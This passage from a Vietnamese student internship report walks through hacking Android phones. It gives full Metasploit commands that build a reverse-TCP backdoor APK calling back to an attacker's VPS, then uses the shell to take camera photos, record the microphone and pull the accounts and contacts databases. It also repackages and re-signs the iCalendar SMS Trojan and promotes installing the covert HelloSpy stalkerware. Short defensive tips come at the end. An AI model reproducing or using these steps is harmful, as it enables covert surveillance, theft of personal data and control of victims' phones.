Giả sử muốn dùng payload windows/meterpreter/reverse_ord_tcp thì ta thao tác là:
set PAYLOAD windows/meterpreter/reverse_ord_tcp
Ta nhận đc là: PAYLOAD => windows/meterpreter/reverse_ord_tcp
Tượng tự để xem rõ thông tin, options về payload ta có thể dùng các lệnh như "show options",
"info name_payload" ,"show advanced",…
Sau khi thực hiện tất cả các thiết lập xong thì ta dùng lệnh "exploit" để xem kết quả.
3.4.Tấn công android dùng Metasploit Framework trong Kali Linux
Trước tiên chúng ta sẽ tạo ra một backdoor bằng cách dùng lệnh:
msfpayload android/meterpreter/reverse_tcp lhost=192.168.159.128 lport=8080 R >
/root/Desktop/app.apk
Hình 30.
Trong đó 192.168.159.128 là địa chỉ ip của máy Kali.Chúng ta có thể xem nó bằng cách dùng lệnh:
ifconfig
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 43
Hình 31.
Và đây là file app.apk mà chúng ta vừa tạo
Hình 32.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 44
Tiếp theo chúng ta mở metasploit bằng cách dùng lệnh:
msfconsole
Hình 33.
Chúng ta cài đặt các thông số cần thiết
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.159.128
set lport 8080
Với lhost và lport giống với khi chúng ta tạo file app.apk
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 45
Hình 34.
Ta mở một cái android ảo và tải về file app.apk, cài đặt và mở lên được giao diện như dưới, nhấp
vào nút Reverse_tcp:
Hình 35.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 46
Vậy là ta đã kết nối thành công tới máy android này, ở msfconsole sẽ như sau:
Hình 36.
Để xem thông tin về máy, nhập lệnh sysinfo
- Sử dụng camera:
Để xem danh sách camera, nhập webcam_list
Hình 37.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 47
Để chụp hình bằng camera, nhập webcam_snap a với a là id của camera xem ở danh sách camera
ở phần trước. Ví dụ như sau:
Hình 38.
- Ghi âm
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
Hình 39.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 48
- Lấy file từ sd card
Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục
Hình 40.
Ta tải file app.apk trong thư mục Download của sdcard
Dùng lệnh cd /sdcard/Download để vào thư mục
Hình 41.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 49
Như trên hình, ta thấy 1 file là app.apk, để tải về máy, ta nhập lệnh
download app.apk
Hình 42.
Và file này sẽ được tải về thư mục root của máy Kali
4. Thực hiện xâm nhập android thông qua mạng Internet 4.1.Giới thiệu về VPS
4.1.1. VPS là gì?
Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ vật lý thành
nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host thì có thể có hàng trăm tài
khoản chạy cùng lúc, nhưng trên server chạy VPS thì con số này chỉ bằng 1/10. Do vậy, VPS
có hiệu năng cao hơn Share Host rất nhiều.
Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn quyền quản
lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% khả năng bị
hack local.
Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên server,
nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website khác cùng
server, riêng server VPS, một tài khoản trên VPS bị tấn công thì mọi tài khoản khác trên VPS
đều hoạt động bình thường.
VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng, nếu chạy
trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi người sử dụng phải có
thêm một số kiến thức về bảo mật, cấu hình server,….
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 50
4.1.2. Đặc điểm về thông số VPS
Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung lượng RAM
riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ điều hành riêng.
Tiết kiệm được nhiều chi phí so với việc thuê một server riêng.
Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng khác thì có
thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng trình duyệt Web trên VPS,
dowload/upload bittorrent với tốc độ cao…
Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên mà không
cần phải khởi động lại hệ thống.
Có thể cài lại hệ điều hành với thời gian từ 5-10 phút.
4.1.3. Giá trị khi sử dụng VPS
Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS phù hợp.
Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng.
Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng.
Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection.
Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 51
4.2.Cài đặt metasploit
Để cài đặt metasploit trước tiên ta phải vào trang http://metasploit.com để tải bộ cài đặt metasploit
về máy của mình. Ta nhấp vào phần Free Metasploit Download và nó sẽ hiện ra trang bên dưới
Ở đây mình sẽ down bản METASPLOIT COMMUNITY.
Hình 43.
Sau khi nhấp vào link, nó sẽ xuất hiện một trang đăng kí. Mình nhập thông tin đầy đủ và nhấp vào
SUBMIT & DOWNLOAD để nhận một license
Hình 44.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 52
Tiếp theo nó sẽ xuất hiện trang download, ta sẽ chọn bản phù hợp.
Hình 45.
Sau khi tải xong, ta bắt đầu tiến trình cài đặt. Trước tiên ta nhấp vào bản cài đặt và nhấn Next
Hình 46. Hình 47.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 53
Bên dưới ta chọn thư mục để cài đặt và nhấn Next
Hình 48.
Ta phải đảm bảo rằng các phần mềm diệt virut đều được đóng, nếu không nó sẽ ngăn cản việc cài
đặt
Hình 49.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 54
SLL Port, Server Name và Days of validity ta để mặc định
Hình 50. Hình 51.
Ta tiếp tục nhấn Next để bắt đầu cài đặt
Hình 52. Hình 53.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 55
Cài đặt xong ta nhấp Finish để kết thúc việc cài đặt
Hình 54.
Sau khi kết thúc việc cài đặt, ta sẽ vào link http://localhost:3790/ để đăng kí tài khoản. Ta nhấp đầy
đủ theo những yêu cầu bên dưới và nhấn Create Account
Hình 55.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 56
Sau đó trình duyệt sẽ chuyển đến trang nhập key để active chương trình
Hình 56.
Ta vào địa chỉ mail mà ta đã sử dụng khi download bộ cài đăt metasploit, điền key vào và nhấn
ACTIVE LICENSE
Hình 57.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 57
Như vậy là ta đã có một tài khoản metasploit
Hình 58.
4.3.Xâm nhập vào thiết bị android
Trước tiên ta mở Terminal trong Kali Linux lên và gõ lệnh để tạo một backdoor:
msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.184 lport=4444 R>
/root/Desktop/app.apk
Trong đó 14.0.21.184 là địa chỉ máy VPS của ta.
/root/Desktop/app.apk là đường dẫn chứa file vừa tạo.
Hình 59.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 58
Sau khi tạo một backdoor được tạo, ta tải nó lên mạng.
Khi máy android down về cài đặt và truy cập vào thì sẽ hiện lên như bên dưới:
Hình 60.
Ta vào máy VPS và mở Metasploit Console lên
Hình 61.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 59
Sau đó ta sẽ đánh các lệnh như bên dưới để tạo một môi trường và liên kết với máy android mà ta
sẽ tấn công:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 14.0.21.184
set lport 4444
run
Ở đây lhost và lport phải giống với lhost và lport khi tạo backdoor
Hình 62.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 60
Khi máy android nhấp vào biểu tượng có chữ ReverseTCP thì sẽ có thông báo là đã kết nối
Hình 63.
Ta gõ lệnh help để hiện lên các lệnh mà ta có thể sử dụng để hack android
Hình 64.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 61
- Xem thông tin
Ta dùng lệnh sysinfo để xem thông tin máy android
Hình 65.
- Xem camera
Ta dùng lênh webcam_list để xem danh sách các camera
Ta dùng lệnh webcam_snap x để chụp một bức ảnh từ camera của máy android.
Trong đó: x là 1: Back Camera
2: Front Camera
Hình 66.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 62
Để di chuyển đến thư mục nào ta dùng lệnh
cd <đường dẫn đến thư mục>
Lệnh ls để xem trong thư mục có những gì
Hình 67.
Ta vào thư mục /sdcard/Download để down file về
- Download file
Ta dùng lệnh download <tên file> để down file đó về máy VPS của ta
Hình 68.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 63
Muốn xóa một file ta dùng lệnh rm <tên file>
Hình 69.
- Đánh cắp tài khoản, danh bạ
Để đánh cắp tài khoản trước tiên ta phải vào hệ thống của máy android. Lưu ý: máy android này
phải được root trước đó.
Ta dùng lệnh shell để vào hệ thống
Dùng lệnh su để toàn quyền truy cập
Dùng lệnh whoami để biết máy android đã được root chưa. Nếu rồi thì nó sẽ hiện thông báo là
unknown uid 0
Hình 70.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 64
Ta gõ cd /data/system để vào thư mục system
Tiếp theo gõ ls –l để xem trong thư mục có gì
Hình 71.
Ta gõ lệnh cp accounts.db /sdcard để copy file accounts.db về Sdcard
Hình 72.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 65
Sau đó ta trở về meterpreter bằng lệnh exit rồi dùng lệnh
download file accounts.db về máy VPS của chúng ta
Hình 73.
Tiếp tục ta vào địa chỉ
cd /data/data/com.android.providers.contacts/databases
Để copy file contacts2.db về Sdcard bằng lệnh
cp contacts2.db /sdcard
Hình 74.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 66
Sau đó ta download file contacts2.db về máy VPS
Hình 75.
Ta mở file *.db bằng phần mềm SQLite. Ta có thể down phần mềm đó về vài cài vào VPS của
chúng ta
Hình 76.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 67
5. Cài đặt SMS Trojan dùng iCalender 5.1. Cài đặt máy ảo android AVD Manager
5.1.1. Cài đặt JDK:
JDK (Java Development Kit) là bộ công cụ phát triển Java. Nó bao gồm nhiều chương trình tiện
ích như trình biên dịch javac (java compiler), chương trình gỡ lỗi, appletviewer, trình phát sinh tài
liệu javadoc, đóng gói dữ liệu jar v.v... Nếu ai muốn lập trình ứng dụng bằng ngôn ngữ java thì bắt
buộc phải cài JDK.
- Bước 1: Trước tiên để cài đặt JDK, chúng ta vào link bên dưới và tải jdk về
Link:
http://www.oracle.com/technetwork/java/javase/downloads/index.html?ssSourceSiteId=otnjp
Hình 77. Hình 78.
Chú ý: Nếu chúng ta dùng hệ điều hành nào thì ta tải phiên bản dùng cho hệ điều hành đó. Ở đây
em tải bản dùng cho windows x64.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 68
- Bước 2: Cài đặt jdk
Ta nhấp chuột vào file cài đặt đã tải về và cài như các chương trình bình thường.
Hình 79.
5.1.2. Cài đặt android SDK
Android SDK thực chất là tập hợp các công cụ và thư viện để phát triển các ứng dụng trên nền
tảng hệ điều hành Android.
- Bước 1: Trước tiên ta phải tải android SDK về máy theo link bên dưới.
Link:
http://developer.android.com/sdk/index.html
Hình 80. Hình 81.
Chú ý: ta nên tải bản phù hợp với hệ điều hành của mình. Ở đây em tải bản cho windows x
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 69
- Bước 2: Tải các packages trong android SDK manager
Ta giải nén file đã down về, trong đó gồm có: một thư mục eclipse, một thư mục SDK và một
file SDK Manager.
Vào thư mục eclipse và mở file eclipse.exe lên. Trong eclipse, ta vào Window -> Android SDK
Manager để mở bảng Android SDK Manager.
Hình 82.
Ta muốn sử dụng gói công cụ nào thì đánh dấu vào gói công cụ đó rồi nhấn Install.
5.1.3. Cài đặt máy ảo android
Sau khi đã tải và cài đặt các gói cần thiết cho việc cài đặt máy ảo, ta vào Window -> Android
Virtual Device Manager để mở cửa sổ AVD Manager như bên dưới
Hình 83.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 70
Ta nhấp vào Create để bắt đầu tạo một máy ảo mới
Hình 84.
AVD name: tên của máy ảo sẽ được tạo
Device: chọn thiết bị muốn tạo máy ảo
Target: chọn phiên bản android cho máy ảo
Skin: chọn kích cỡ của màn hình
Internal Storage: chọn dung lượng bộ nhớ trong
SD card: dung lượng thẻ SD
Sau khi chọn xong ta nhấn OK. Để mở máy ảo lên ta nhấp vào máy ảo vừa tạo và nhấn Start.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 71
Đây là máy ảo thu được:
Hình 85.
5.2. Cài SMS Trojan vào máy android ảo
5.2.1. Các công cụ cần thiết
- apktool: giải mã các file .apk và .rar, đóng gói apk phục vụ cho việc tùy chỉnh sửa đổi các file
đó. https://code.google.com/p/android-apktool/
- dex2jar: dịch file .apk thành file .jar. https://code.google.com/p/dex2jar/
- id-gui: đọc code java từ file .jar. https://code.google.com/p/innlab/downloads/detail?name=jd-
gui-0.3.3.windows.zip&can=2&q=2
- File iCalendar.apk, một trong 11 ứng dụng bị gỡ bỏ khỏi Android Market do có chứa malware.
- Hai máy ảo android dùng công cụ AVD Manager
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 72
5.2.2. Các bước thực hiện
- Bước 1: Dùng phần mềm WinZip giải nén file classes.dex trong iCalendar.apk vào folder
chứa công cụ dex2jar.
Hình 86.
- Bước 2: Vào command windows, vào trong thư mục dex2jar để thực hiện câu lệnh sau:
dex2jar classes.dex
Câu lệnh này chuyển đổi file classes.dex thành file classes_dex2jar.jar.
Hình 87.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 73
- Bước 3: Dùng công cụ id-gui để mở file classes_dex2jar.jar có được ở bước 2 để xem
source code của ứng dụng iCalendar.
Hình 88.
- Bước 4: Vào command windows, vào trong thư mục chứa apktool (phải chứa sẵn
iCalendar.apk) và nhập 2 lệnh sau:
apktool if iCalendar.apk
apktool d iCalendar.apk
Ta được kết quả:
Hình 89.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 74
Truy cập vào thư mục iCalendar và di chuyển đến thư mục smali\com\mj\iCalendar
Hình 90.
- Bước 5: Mở file iCalendar.smali và file SmsReceiver.smali bằng Notepad và thực hiện
như hình bên dưới sau đó lưu lại.
Hình 91.
Hình 92.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 75
- Bước 6: Vào command windows thực hiện câu lệnh sau để đóng gói ứng dụng iCalendar
đã được chỉnh sửa thành file .apk mới tại thư mục iCalendar\dist
Hình 93.
- Bước 7: Đưa file iCalendar.apk đã tạo ở bước 6 vào thư mục bin nằm trong thư mục Java
Hình 94.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 76
Trên command windows vào thư mục trên và nhập các lệnh sau để verify (Signing ứng
dụng, tạo chữ ký điện tử để thiết bị) gói apk để có thể sử dụng trên thiết bị (phải chọn run
as administrator khi chạy cmd):
keytool -genkey -v -keystore iCalendar-iCalendar.keystore -alias iCalendar -keyalg
RSA -keysize 2048 -validity 10000
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore iCalendar-
iCalendar.keystore iCalendar.apk iCalendar
jarsigner -verify -verbose -certs iCalendar.apk
Kết quả:
Hình 95.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 77
- Bước 8: Copy file iCalendar.apk vào thư mục platform-tools của Android
SDK và dùng lệnh sau để cài ứng dụng vào giả lập
adb -s emulator-5554 install iCalendar.apk
Hình 96.
Hình 97.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 78
Vậy ta đã cài đặt thành công lên máy ảo.
- Bước 9: Kích hoạt Trojan gửi tin nhắn đến máy ảo 5556 (mở ứng dụng
iCalendar rồi click 7 lần).
Kết quả:
Hình 98.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 79
6. Tìm hiểu về HelloSpy để theo dõi thiết bị android 6.1.HelloSpy là gì?
HelloSpy được xem là một trong những công cụ mạnh mẽ nhất trong dòng sản phẩm gián điệp.
Nó cung cấp một loạt các tùy chọn theo dõi điện thoại di động và một số phạm vi nó là phần mềm
ứng dụng phổ biến nhất trong số các đối thủ cạnh tranh của nó.
HelloSpy là gián điệp smartphone mạnh nhất và phần mềm theo dõi cho phép bạn theo dõi tất
cả các hoạt động của bất kỳ iPhone hay điện thoại Android. HelloSpy là siêu dễ dàng để cài đặt trên
điện thoại mà em muốn theo dõi. Nó bắt đầu tải lên thông tin sử dụng điện thoại theo dõi và vị trí
chính xác của nó ngay lập tức có thể được xem bằng cách đăng nhập vào khu vực người dùng
HelloSpy của em từ bất kỳ máy tính (hoặc điện thoại thông minh) trên thế giới trong vòng vài phút.
6.2.Tính năng của HelloSpy
6.2.1. Truy cập từ xa:
HelloSpy sẽ cho em biết về mọi điều mục tiêu làm trên điện thoại của họ. HelloSpy bí mật ghi
lại tất cả các hoạt động điện thoại di động, theo dõi và gửi những chi tiết này vào một tài khoản
web an toàn trực tuyến. Em có thể truy cập tất cả các dữ liệu bị bắt bằng cách này điện thoại di
động Tracker từ xa mà không cần phải có được sự truy cập vật lý đến điện thoại di động của mục
tiêu
6.2.2. Theo dõi các tin nhắn WhatsApp (không có rễ):
HelloSpy cho phép em xem tất cả các cuộc đàm thoại WhatsApp diễn ra thông qua điện thoại
mục tiêu. Với HelloSpy phần mềm theo dõi em có thể: theo dõi tất cả các cuộc trò chuyện
WhatsApp, theo dõi WhatsApp tin nhắn mà không để lại dấu hiệu trên màn hình điện thoại. Có
được thời gian để biết khi nào mỗi cuộc trò chuyện diễn ra. Tìm ra tên và số của những người mà
họ đã trò chuyện.
6.2.3. Theo dõi lịch sử Internet:
Rà soát tất cả các địa chỉ trang web URL truy cập mà mục tiêu sử dụng trình duyệt của điện
thoại. Em có thể tìm hiểu xem mục tiêu đã xem một cái gì đó bị cấm trên các trang web mạng xã
hội.
6.2.4. Spy cuộc gọi ghi âm:
Có rất nhiều trường hợp khi em có thể nhận được hành vi có hại hoặc không mong muốn ở nhà
hoặc nơi làm việc. Theo dõi lịch sử cuộc gọi với HelloSpy, em sẽ nhận được các bằng chứng cần
thiết để có thể đối mặt với mục tiêu.
6.2.5. Theo dõi tất cả bắt hình ảnh:
Ghi lại tất cả hình ảnh chụp bởi máy ảnh điện thoại mục tiêu. Tự động gửi hình ảnh vào tài
khoản trực tuyến của em mà không cần sử dụng iTunes hoặc phần mềm máy tính.
6.2.6. Kiểm soát các ứng dụng và chương trình:
Nếu bạn muốn giới hạn cơ hội để sử dụng không phù hợp của thiết bị di động mục tiêu, em có
thể sử dụng HelloSpy để kiểm soát các ứng dụng và chương trình điện thoại di động có thể truy
cập.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 80
6.2.7. Theo dõi tin nhắn SMS:
Với sự giúp đỡ của các ứng dụng HelloSpy bạn có thể giám sát chặt chẽ văn bản và đa truyền
thông vào và ra. Các tin nhắn chặn được ghi nhận trên bảng điều khiển trực tuyến an toàn của bạn
để xem ngay lập tức và có thể được nhìn thấy ngay cả khi chúng được xóa từ các thiết bị chính nó.
6.2.8. Theo dõi Viber, facebook và yahoo thông điệp:
Với HelloSpy bạn có thể tìm hiểu về bất kỳ tin nhắn Viber, thông điệp facebook và yahoo chat được
thực hiện và nhận được quyền truy cập vào tất cả các Viber, facebook và yahoo cuộc trò chuyện
diễn ra thông qua điện thoại di động giám sát. Với HelloSpy Viber phần mềm gián điệp bạn có thể:
Xem tất cả các cuộc trò chuyện thông điệp cuộc đàm thoại từ xa.
6.2.9. GPS Tracking:
Theo dõi GPS cho phép bạn sử dụng HelloSpy biểu đồ vị trí của điện thoại bạn đang theo dõi và
phần mềm Hack Viber
6.2.10. Lịch sử màn hình cuộc gọi:
Với HelloSpy là một phần mềm gián điệp điện thoại di động cho phép em theo dõi màn hình
điện thoại của mục tiêu trong thời gian thực. Các ứng dụng có thể được thiết lập để thực sự ghi lại
các cuộc gọi đến hoặc đi.
6.3.Cài đặt HelloSpy
Trước tiên ta dùng điện thoại vào trang http://hellospy.com/homepage.aspx?lang=en-US và nhấp
vào How To Install
Ở đây, em không có điện thoại thật nên sử dụng máy ảo android.
Hình 99.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 81
Tiếp theo em nhấp vào Android
Hình 100.
Em tiếp tục nhấp vào Download
Hình 101.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 82
Tiếp theo em bắt đầu cài đặt. Nhấp vào Unknown sources để được phép cài đặt
Hình 102.
Em tiếp tục nhấp vào Install
Hình 103.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 83
Sau khi cài đạt xong, nó sẽ hiện chỗ mình đăng ký tài khoản.
Đăng ký xong, em sẽ gọi số #8888* để có thể vào được lựa chọn các app như bên dưới
Em có thể tùy chỉnh các ứng dụng mà mình muốn dùng.
Xong, em nhấp Accept
Hình 104.
Mỗi lần điện thoại của mục tiêu truy cập Internet thì nó sẽ cập nhập thông tin một lần.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 84
Bây giờ thì chúng ta có thể bắt đầu trải nghiệm HelloSpy.
Hình 105.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 85
7. Tổng kết Sau quá trình tìm hiều về đề ta, em đã biết được phần nào cách thức mà các tin tặc tấn công và xâm
nhập vào thiết bị android để đánh cáp dữ liệu trong đó. Bên cạnh đó em cũng tìm hiểu được các
cách phòng chống, khắc phục để bảo vệ thiết bị android của mình.
Cách duy nhất để ngăn chặn phần mềm độc hại là hạn chế tải về các ứng dụng từ bên ngoài Google
Play, không cắm thiết bị Android vào máy tính (thay vào đó hãy sử dụng các ứng dụng để biến
Android thành ổ đĩa mạng, chẳng hạn như là AirDroid, DroidNAS, vv...), và áp dụng thêm một số
mẹo nhỏ dưới đây:
- Kiểm tra đánh giá ứng dụng: khi bạn tìm thấy một ứng dụng mới và muốn cài đặt, điều đầu
tiên bạn nên làm là tìm đọc những nhận xét từ những người dùng khác. Qua đó, bạn có thể
cảm nhận được phần nào về ứng dụng và đưa ra những quyết định đúng đắn.
- Kiểm tra hồ sơ của nhà phát triển: nếu chưa an tâm với những đánh giá của người dùng, bạn
hãy tiếp tục kiểm tra thêm phần hồ sơ của nhà phát triển ứng dụng để xem nó có đáng tin
cậy hay không.
- Hãy xem rõ các điều lệ khi cấp quyền cho ứng dụng: khi bấm nút Install để thiết bị bắt đầu
tải về và cài đặt, bạn hãy xem rõ toàn bộ các quyền mà ứng dụng yêu cầu, nếu thấy có điều
gì đó quá đáng hoặc không hợp lý, hãy ngưng việc cài đặt ngay lập tức. Chẳng hạn như các
ứng dụng đọc báo, đọc truyện hay xem tivi mà lại có yêu cầu gửi tin nhắn đi từ điện thoại
của bạn là không hợp lý!
Thường xuyên quét toàn bộ thiết bị: để thực hiện việc này, bạn có thể cài đặt một trong các phần
mềm chống virus được giới thiệu bên trên, và hãy quét qua toàn bộ thiết bị mỗi ngày, hoặc ít nhất
mỗi tuần một lần
Nhưng khi máy mình đã lỡ dính những phần mềm độc hại thì ta cũng có biện pháp khác phục nó.
Cách tốt nhất để loại bỏ malware là cài thêm một chương trình chống virus trên thiết bị. Tuy nhiên,
bạn hãy cẩn thận và chỉ cài đặt các ứng dụng có tên tuổi được nhiều người sử dụng, nếu không thì
bạn sẽ lại rước thêm của nợ về máy. Dưới đây là một số phần mềm miễn phí mà bạn có thể tham
khảo:
- Avast! Mobile Security (http://itechnews360.com/avastmobile): chương trình có thể quét
toàn bộ ứng dụng trên thiết bị theo lựa chọn của người dùng, hoặc tự động quét theo lịch
trình được đặt sẵn. Khi duyệt web, nó sẽ phát hiện và ngăn chặn các liên kết nhiễm malware,
giám sát lưu lượng truy cập ra và vào. Bên cạnh đó, nó còn các tính năng tiên tiến khác như
chống trộm, tường lửa thông minh và lọc các tin nhắn SMS hoặc cuộc gọi.
- AVG Antivirus Security (http://itechnews360.com/avgsecurity): ứng dụng này sẽ quét tất
cả các tập tin mới và các ứng dụng mà nó nghi ngờ, sau đó, cung cấp cho bạn các thiết lập
và những lời khuyên để xử lý các lỗ hổng bảo mật. Nó cũng được trang bị thêm một số tính
năng tiên tiến khác như giám sát băng thông và các biện pháp chống trộm.
- 360 Mobile Security (http://itechnews360.com/360security): cung cấp các bảo vệ dựa vào
cơ sở dữ liệu luôn được cập nhật trên đám mây, giúp bạn phát hiện các lỗ hổng bảo mật và
tối ưu hóa các thiết lập tự động. Nhìn chung, đây là chương trình chống virus dễ sử dụng và
có giao diện khá đẹp mắt.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 86
8. Kinh nghiệm đạt được sau đợt thực tập Những kiến thức lý thuyết đã được củng cố:
- Tìm hiểu về đặc điểm, lịch sử cũng như quá trình phát triển của hệ điều hành Android
- Tìm hiểu về hệ điều hành Kali Linux
- Tìm hiểu về các lỗ hổng bảo mật của Windows và Android
- Tìm hiểu về cách sửa đổi file APK và thực hiện Signing ứng dụng
Những kỹ năng thực hành đã được học thêm:
- Thực hiện cài đặt Android trên máy ảo
- Cài đặt Kali Linux, sử dụng nó để hack vào các lỗ hổng bảo mật của Windows và Android
- Thi lấy chứng chỉ System Hacking của trung tâm Athena
- Thực hiện sửa đổi, tạo ra các file Trojan, Backdoor sau đó cài đặt vào Android
- Tìm hiều thêm về HelloSpy
Những kinh nghiệm thực tiễn đã tích lũy được:
- Qua gần 2 tháng thực tập, bản thân em đã đúc kết được nhiều kinh nghiệm quý báu, thứ
nhất đó là các kĩ năng về chuyên môn, em đã được học và cũng cố các kiến thức mới bên cạnh các
kiến thức nền tảng. Hơn đó nữa là quá trình thực tập trong môi trường doanh nghiệp đã cho em làm
quen dần để không bỡ ngỡ trong quá trình đi làm sau này, thông qua các kĩ năng giao tiếp và ứng
xử.
- Em cũng nâng cao được khả năng thuyết trình, trình bài của mình thông qua các bài báo
cáo hàng tuần bằng video clip.
- Em cũng rèn luyện được kỹ năng làm việc nhóm khi cùng các bạn thảo luận, bàn bạc cũng
như phân chia công việc để hoàn thành đề tài một cách tốt nhất.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 87
9. Các link báo báo Báo cáo tuần 1:
- Link slideshare: http://www.slideshare.net/tuankiet123/bo-co-tun-1-37178388
- Link youtube: https://www.youtube.com/watch?v=jW8KlSIm82w
Báo cáo tuần 2:
- Link slideshare: http://www.slideshare.net/tuankiet123/bai-bao-cao-2
- Link youtube: https://www.youtube.com/watch?v=6fnZ06g5y8Y
Báo cáo tuần 3:
- Link slideshare: http://www.slideshare.net/tuankiet123/bai-bao-cao-3
- Link youtube: https://www.youtube.com/watch?v=JdV-Y8hev4A
Báo cái tuần 4:
